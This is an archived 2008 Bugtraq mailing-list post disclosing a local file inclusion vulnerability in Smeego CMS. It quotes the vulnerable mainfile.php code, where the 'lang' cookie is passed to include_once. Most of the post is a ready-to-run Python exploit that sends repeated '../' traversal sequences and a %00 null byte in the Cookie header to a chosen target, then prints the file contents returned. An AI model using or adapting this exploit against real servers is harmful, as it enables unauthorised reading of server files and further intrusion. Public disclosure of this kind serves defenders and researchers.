lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080517233257.1985.qmail@securityfocus.com>
Date: 17 May 2008 23:32:57 -0000
From: 0in.email@...il.com
To: bugtraq@...urityfocus.com
Subject: Smeego CMS vulnerability

# Smeego CMS Local File Include Exploit
#                 by
# 0in from Dark-Coders Programming & Security Group
# >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<
#--------------------------------------------------------
# Contact: 0in(dot)email[at]gmail(dot)com
#--------------------------------------------------------
# Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor
#--------------------------------------------------------
# Description:
# Smeego is a Content Management System or Portal
# System written in PHP and designed to be
# easy to install and use. Smeego has a mature code 
# and comes with cool modules and themes 
# for you to start your own dynamic and database 
# driven website. Bla bla Bla [...]
# -------------------------------------------------------
# Script home: http://smeego.com
# -------------------------------------------------------
# Vuln:
#   >>>>>> File: mainfile.php <<<<<<<
#if ($display_errors == 1) {  // We don't se any errors ;(
#  @ini_set('display_errors', 1);
#} else {
#  @ini_set('display_errors', 0);
#}
#
#if (isset($newlang)) {
#
#       if (file_exists("language/lang-".$newlang.".php")) {
#                setcookie("lang",$newlang,time()+31536000);
#                include_once("language/lang-".$newlang.".php");
#                $currentlang = $newlang;
#        } else {
#                setcookie("lang",$language,time()+31536000);
#                include_once("language/lang-".$language.".php");
#                $currentlang = $language;
#        }
#} elseif (isset($lang)) {
#
#        include_once("language/lang-".$lang.".php");
#        $currentlang = $lang;
#} else {
#        setcookie("lang",$language,time()+31536000);
#        include_once("language/lang-".$language.".php");
#        $currentlang = $language;
#}
#      >>>>>> End <<<<<<<
# So.. We can send Cookie: lang=[lfi]

# -------------------------------------------------------

# Simple Python Exploit:

#!/usr/bin/python
import sys
import time
import httplib
print '====================================================='
print '        Smeego CMS Local File INclude Exploit         '
print '                      by                             '
print ' 0in from Dark-Coders Programming & Security Group!  '
print '             http://dark-coders.4rh.eu               '
print '====================================================='
try:
	target=sys.argv[1]
	path=sys.argv[2]
	file=sys.argv[3]
except Exception:
	print '\nUse: %s [target] [path] [file]' % sys.argv[0]
	quit()
i=0
lfi='../'
target+=":80"
special="%00"
file+=special
for i in range(9):
	lfi+="../"
	print '---------------------------------------------------------'
	mysock=httplib.HTTPConnection(target)
	mysock=httplib.HTTPConnection(target)
	mysock.putrequest("GET",path)
	mysock.putheader("User-Agent","Billy Explorer v666")
	mysock.putheader('Accept', 'text/html')
	mysock.putheader('Accept-Language',' en-us,en;q=0.5')
	mysock.putheader('Cookie','lang=%s%s' % (lfi,file))
	mysock.endheaders()
	reply=mysock.getresponse()
	print reply.read()
	time.sleep(2)
	mysock.close()
	print '----------------------------------------------------------'

#EOFF

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ